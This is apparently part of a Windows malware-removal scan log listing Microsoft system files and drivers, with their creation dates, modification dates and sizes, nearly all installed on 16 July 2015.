2015-07-16 11:50 - 2015-07-09 11:50 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2015-07-16 11:50 - 2015-07-09 11:48 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2015-07-16 11:50 - 2015-07-09 11:46 - 02229248 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2015-07-16 11:50 - 2015-07-09 11:38 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2015-07-16 11:50 - 2015-07-09 11:37 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2015-07-16 11:50 - 2015-07-09 11:35 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2015-07-16 11:50 - 2015-07-09 11:34 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2015-07-16 11:50 - 2015-06-26 23:08 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2015-07-16 11:50 - 2015-06-26 23:08 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2015-07-16 11:50 - 2015-06-26 22:14 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
2015-07-16 11:42 - 2015-05-07 13:50 - 22292672 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2015-07-16 11:42 - 2015-05-07 13:00 - 03109376 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2015-07-16 11:42 - 2015-05-07 12:53 - 19734960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2015-07-16 11:42 - 2015-05-07 12:12 - 02706432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2015-07-16 11:42 - 2015-03-14 04:20 - 01385256 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2015-07-16 11:42 - 2015-03-14 04:13 - 01124352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2015-07-16 11:42 - 2014-12-08 23:45 - 00393728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scesrv.dll
2015-07-16 11:42 - 2014-12-08 21:56 - 00538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\scesrv.dll
2015-07-16 11:36 - 2015-04-24 22:34 - 00653824 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2015-07-16 11:36 - 2015-04-24 22:33 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2015-07-16 11:36 - 2015-04-09 21:00 - 01996800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2015-07-16 11:36 - 2015-04-09 20:50 - 01387008 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2015-07-16 11:36 - 2015-04-09 20:26 - 01560576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2015-07-16 11:35 - 2015-03-23 17:59 - 07476032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-07-16 11:35 - 2015-03-23 17:59 - 01733952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-07-16 11:35 - 2015-03-23 17:59 - 00360480 _____ (Microsoft Corporation) C:\WINDOWS\system32\sechost.dll
2015-07-16 11:35 - 2015-03-23 17:58 - 01498872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-07-16 11:35 - 2015-03-23 17:45 - 00257216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sechost.dll
2015-07-16 11:35 - 2015-03-20 00:12 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2015-07-16 11:35 - 2015-03-20 00:10 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
2015-07-16 11:35 - 2015-03-20 00:10 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
2015-07-16 11:35 - 2015-03-19 23:17 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\tracerpt.exe
2015-07-16 11:35 - 2015-03-19 22:41 - 00369152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tracerpt.exe
2015-07-16 11:35 - 2015-03-19 22:40 - 00950784 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2015-07-16 11:35 - 2015-03-19 22:16 - 00749568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2015-07-16 11:35 - 2014-10-28 21:57 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
2015-07-16 11:35 - 2014-10-28 21:15 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
2015-07-16 11:35 - 2014-10-28 21:15 - 00005632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
2015-07-16 11:35 - 2014-10-28 21:14 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
2015-07-16 11:35 - 2014-10-28 21:13 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
2015-07-16 11:35 - 2014-10-28 21:13 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
2015-07-16 11:34 - 2015-02-02 20:03 - 03551744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2015-07-16 11:34 - 2015-02-02 20:02 - 04298240 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2015-07-16 11:34 - 2015-01-29 22:03 - 01488896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42u.dll
2015-07-16 11:34 - 2015-01-29 22:03 - 01464832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42.dll
2015-07-16 11:34 - 2015-01-29 21:44 - 01230336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42u.dll
2015-07-16 11:34 - 2015-01-29 21:42 - 01204224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42.dll
2015-07-16 11:34 - 2014-06-09 18:13 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2015-07-16 11:34 - 2014-06-09 18:13 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2015-07-16 11:33 - 2015-05-03 11:09 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-07-16 11:33 - 2015-05-03 10:58 - 00210944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2015-07-16 11:33 - 2015-05-03 10:55 - 00971776 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSShared.dll
2015-07-16 11:33 - 2015-05-03 10:49 - 00811008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSShared.dll
2015-07-16 11:33 - 2015-03-05 22:47 - 01696256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2015-07-16 11:33 - 2015-02-17 19:19 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapisrv.dll
2015-07-16 11:33 - 2015-01-27 22:24 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageContextHandler.dll
2015-07-16 11:33 - 2015-01-27 21:47 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StorageContextHandler.dll
2015-07-16 11:17 - 2015-01-30 19:20 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2015-07-16 11:17 - 2015-01-27 00:22 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2015-07-16 11:17 - 2015-01-26 22:11 - 03547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2015-07-16 11:16 - 2015-03-13 21:51 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wu.upgrade.ps.dll
2015-07-16 11:16 - 2015-03-13 20:09 - 00200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2015-07-16 11:16 - 2014-10-18 02:50 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaext.dll
2015-07-16 11:16 - 2014-07-23 23:20 - 00875688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll
2015-07-16 11:16 - 2014-07-23 23:20 - 00869544 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll
2015-07-16 11:15 - 2015-05-11 12:34 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcpl.dll
2015-07-16 11:15 - 2015-05-07 12:47 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\apphelp.dll
2015-07-16 11:15 - 2015-03-10 21:49 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdbinst.exe
2015-07-16 11:15 - 2015-03-10 21:09 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sdbinst.exe
2015-07-16 11:14 - 2015-05-12 09:19 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemEventsBrokerServer.dll
2015-07-16 11:14 - 2015-05-03 11:07 - 07784448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2015-07-16 11:14 - 2015-05-03 10:57 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2015-07-16 11:14 - 2015-05-01 19:33 - 00410739 _____ C:\WINDOWS\system32\ApnDatabase.xml
2015-07-16 11:10 - 2015-04-29 19:22 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2015-07-16 11:10 - 2015-01-26 23:44 - 00933888 _____ (Microsoft Corporation) C:\WINDOWS\system32\calc.exe
2015-07-16 11:10 - 2015-01-23 21:51 - 00816128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\calc.exe
2015-07-16 11:09 - 2014-10-30 19:39 - 01970432 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2015-07-16 11:09 - 2014-10-30 19:38 - 01612992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2015-07-16 11:03 - 2015-03-17 13:26 - 00467776 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2015-07-16 10:57 - 2015-06-24 22:31 - 04177920 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2015-07-16 10:57 - 2015-06-15 18:41 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
2015-07-16 10:57 - 2015-06-15 18:24 - 03320320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2015-07-16 10:57 - 2015-06-15 17:16 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
2015-07-16 10:57 - 2015-06-15 17:09 - 03607552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2015-07-16 10:57 - 2015-06-15 16:50 - 02774528 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2015-07-16 10:57 - 2015-06-15 15:57 - 02460160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2015-07-16 10:57 - 2015-01-23 03:17 - 00723072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2015-07-16 10:57 - 2015-01-23 01:02 - 00560392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2015-07-16 10:54 - 2015-01-28 21:58 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\photowiz.dll
2015-07-16 10:54 - 2015-01-28 21:29 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\photowiz.dll
2015-07-16 10:50 - 2015-04-30 19:05 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2015-07-16 10:50 - 2015-04-30 18:48 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2015-07-16 10:37 - 2015-03-19 21:56 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ahcache.sys
2015-07-16 10:36 - 2015-03-19 23:49 - 00309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\compstui.dll
2015-07-16 10:36 - 2015-03-19 23:08 - 00477184 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2015-07-16 10:36 - 2015-03-19 22:37 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\puiobj.dll
2015-07-16 10:36 - 2015-03-19 22:07 - 01091072 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2015-07-16 10:36 - 2015-01-28 21:04 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2015-07-16 10:31 - 2015-03-03 21:32 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2015-07-16 10:31 - 2015-03-03 21:12 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2015-07-16 10:30 - 2015-03-01 21:43 - 00222208 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastapi.dll
2015-07-16 10:30 - 2015-03-01 21:21 - 00207872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastapi.dll
2015-07-16 10:30 - 2015-01-29 20:53 - 02819584 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers.dll
2015-07-16 10:30 - 2014-11-14 02:58 - 00116736 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsDatabase.dll
2015-07-16 10:16 - 2015-04-01 18:22 - 02985984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2015-07-16 10:16 - 2015-04-01 18:20 - 04417536 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2015-07-16 10:16 - 2015-03-31 23:45 - 01491456 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2015-07-16 10:16 - 2015-03-31 22:31 - 01207296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2015-07-16 10:16 - 2015-03-12 21:11 - 02162176 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2015-07-16 10:16 - 2015-03-12 20:39 - 01812992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2015-07-16 10:16 - 2015-02-05 16:24 - 01113920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2015-07-16 10:16 - 2015-01-29 23:01 - 00097792 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbth.sys
2015-07-16 10:16 - 2015-01-29 22:02 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappgnui.dll
2015-07-16 10:16 - 2015-01-29 21:40 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappgnui.dll
2015-07-16 10:16 - 2015-01-29 21:37 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapp3hst.dll
2015-07-16 10:16 - 2015-01-29 21:29 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\atlthunk.dll
2015-07-16 10:16 - 2015-01-29 21:24 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapphost.dll
2015-07-16 10:16 - 2015-01-29 21:24 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapp3hst.dll
2015-07-16 10:16 - 2015-01-29 21:16 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapphost.dll
2015-07-16 10:16 - 2015-01-29 21:08 - 00346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappcfg.dll
2015-07-16 10:16 - 2015-01-29 21:06 - 00278016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappcfg.dll
2015-07-16 10:16 - 2014-12-11 22:04 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWbPrxy.exe
2015-07-16 10:16 - 2014-12-05 23:17 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2015-07-16 10:16 - 2014-12-05 21:41 - 00391680 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2015-07-16 10:14 - 2015-03-12 22:02 - 00316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\udfs.sys
2015-07-16 10:14 - 2014-11-04 15:25 - 00059712 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdclass.sys
2015-07-16 10:14 - 2014-11-04 15:25 - 00051008 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouclass.sys
2015-07-16 10:14 - 2014-11-04 02:55 - 00026112 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sermouse.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00108544 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\i8042prt.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00032256 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00030208 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouhid.sys
2015-07-16 10:13 - 2015-04-08 18:41 - 00158720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rgb9rast.dll
2015-07-16 10:13 - 2015-04-02 20:35 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoMetadataHandler.dll
2015-07-16 10:13 - 2015-04-02 20:14 - 00364544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoMetadataHandler.dll
2015-07-16 10:10 - 2015-06-29 18:43 - 00026288 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2015-07-16 10:10 - 2015-06-29 11:07 - 01145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2015-07-16 10:10 - 2015-06-26 19:21 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2015-07-16 10:10 - 2015-06-26 19:21 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepdu.dll
2015-07-16 10:10 - 2015-05-21 09:08 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2015-07-16 10:09 - 2015-04-08 18:55 - 00410128 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2015-07-16 10:09 - 2014-12-19 02:26 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2015-07-16 10:08 - 2015-03-12 22:58 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\pku2u.dll
2015-07-16 10:08 - 2015-03-12 22:37 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pku2u.dll
2015-07-16 10:08 - 2015-01-19 14:42 - 01487976 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2015-07-16 09:54 - 2015-04-09 20:40 - 01249280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2015-07-16 09:54 - 2015-04-09 20:17 - 01018880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2015-07-16 09:44 - 2015-04-16 02:17 - 00325464 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2015-07-16 09:37 - 2015-06-10 23:49 - 01380600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2015-07-16 09:37 - 2015-06-10 12:13 - 01097216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2015-07-16 09:37 - 2015-04-01 00:21 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2015-07-16 09:37 - 2015-04-01 00:18 - 00468480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2015-07-16 09:37 - 2015-04-01 00:17 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssphtb.dll
2015-07-16 09:37 - 2015-04-01 00:08 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2015-07-16 09:37 - 2015-03-31 23:46 - 03633664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2015-07-16 09:37 - 2015-03-31 23:17 - 02551808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2015-07-16 09:37 - 2015-03-31 23:17 - 00903168 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2015-07-16 09:37 - 2015-03-31 22:53 - 00391680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2015-07-16 09:37 - 2015-03-31 22:53 - 00272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2015-07-16 09:37 - 2015-03-31 22:45 - 02749952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2015-07-16 09:37 - 2015-03-31 22:45 - 00699392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2015-07-16 09:37 - 2015-03-31 22:14 - 01920000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2015-07-16 09:37 - 2015-03-31 22:12 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2015-07-16 09:37 - 2015-02-24 04:32 - 00991552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2015-07-16 09:37 - 2015-01-29 14:45 - 01763352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2015-07-16 09:37 - 2015-01-29 14:34 - 01488040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2015-07-16 09:37 - 2014-12-11 01:36 - 00046456 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockScreenContentServer.exe
2015-07-16 09:36 - 2015-06-16 01:36 - 01661576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2015-07-16 09:36 - 2015-06-16 01:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2015-07-16 09:36 - 2015-04-28 09:13 - 00513480 _____ C:\WINDOWS\SysWOW64\locale.nls
2015-07-16 09:36 - 2015-04-28 09:13 - 00513480 _____ C:\WINDOWS\system32\locale.nls
2015-07-16 09:36 - 2015-04-23 11:47 - 03084288 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2015-07-16 09:36 - 2015-04-23 11:16 - 02471424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2015-07-16 09:36 - 2015-03-05 23:08 - 02067968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpdshext.dll
2015-07-16 09:36 - 2015-03-05 22:43 - 01969664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpdshext.dll
2015-07-16 09:36 - 2015-03-04 06:25 - 00377152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2015-07-16 09:36 - 2015-03-03 23:04 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clfsw32.dll
2015-07-16 09:36 - 2015-03-03 22:19 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clfsw32.dll
2015-07-16 09:36 - 2015-02-07 19:57 - 01090048 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2015-07-16 09:36 - 2015-02-07 19:49 - 00791040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2015-07-16 09:36 - 2015-01-27 21:31 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2015-07-16 09:36 - 2015-01-27 21:11 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2015-07-16 09:35 - 2015-01-27 19:47 - 02501368 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2015-07-16 09:35 - 2015-01-27 19:41 - 02207488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2015-07-16 08:42 - 2015-06-28 01:07 - 00442712 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2015-07-16 08:42 - 2015-06-28 01:07 - 00178008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2015-07-16 08:42 - 2015-06-28 01:06 - 01311960 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2015-07-16 08:42 - 2015-06-28 01:06 - 00332120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2015-07-16 08:42 - 2015-06-27 12:42 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2015-07-16 08:42 - 2015-06-26 23:13 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2015-07-16 08:42 - 2015-06-26 23:12 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2015-07-16 08:42 - 2015-06-26 23:12 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2015-07-16 08:42 - 2015-06-26 22:40 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2015-07-16 08:42 - 2015-06-26 22:05 - 01441792 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2015-07-16 08:42 - 2015-06-26 22:00 - 00989184 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2015-07-16 08:42 - 2015-06-26 21:53 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2015-07-16 08:42 - 2015-06-26 21:26 - 00802816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2015-07-16 08:42 - 2015-03-30 01:47 - 00561928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2015-07-16 08:41 - 2015-05-30 17:18 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\werdiagcontroller.dll
2015-07-16 08:41 - 2015-05-30 15:36 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2015-07-16 08:41 - 2015-05-30 15:35 - 00911360 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2015-07-16 08:41 - 2015-03-08 22:02 - 00057856 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2015-07-16 08:41 - 2014-12-19 04:57 - 00788680 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2015-07-16 08:41 - 2014-12-19 04:25 - 00602776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00535640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00531616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00448792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00413248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00372408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00108944 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDump.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00038264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2015-07-16 08:41 - 2014-12-08 15:42 - 00033584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2015-07-16 08:41 - 2014-10-30 18:37 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2015-07-16 08:41 - 2014-10-30 18:34 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2015-07-16 08:40 - 2015-05-02 20:39 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2015-07-16 08:38 - 2015-05-07 11:21 - 00522240 _____ (Microsoft Corporation) C:\WINDOWS\system32\GeofenceMonitorService.dll
2015-07-16 08:38 - 2015-05-07 11:05 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GeofenceMonitorService.dll
2015-07-16 08:38 - 2015-04-09 20:34 - 02256896 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
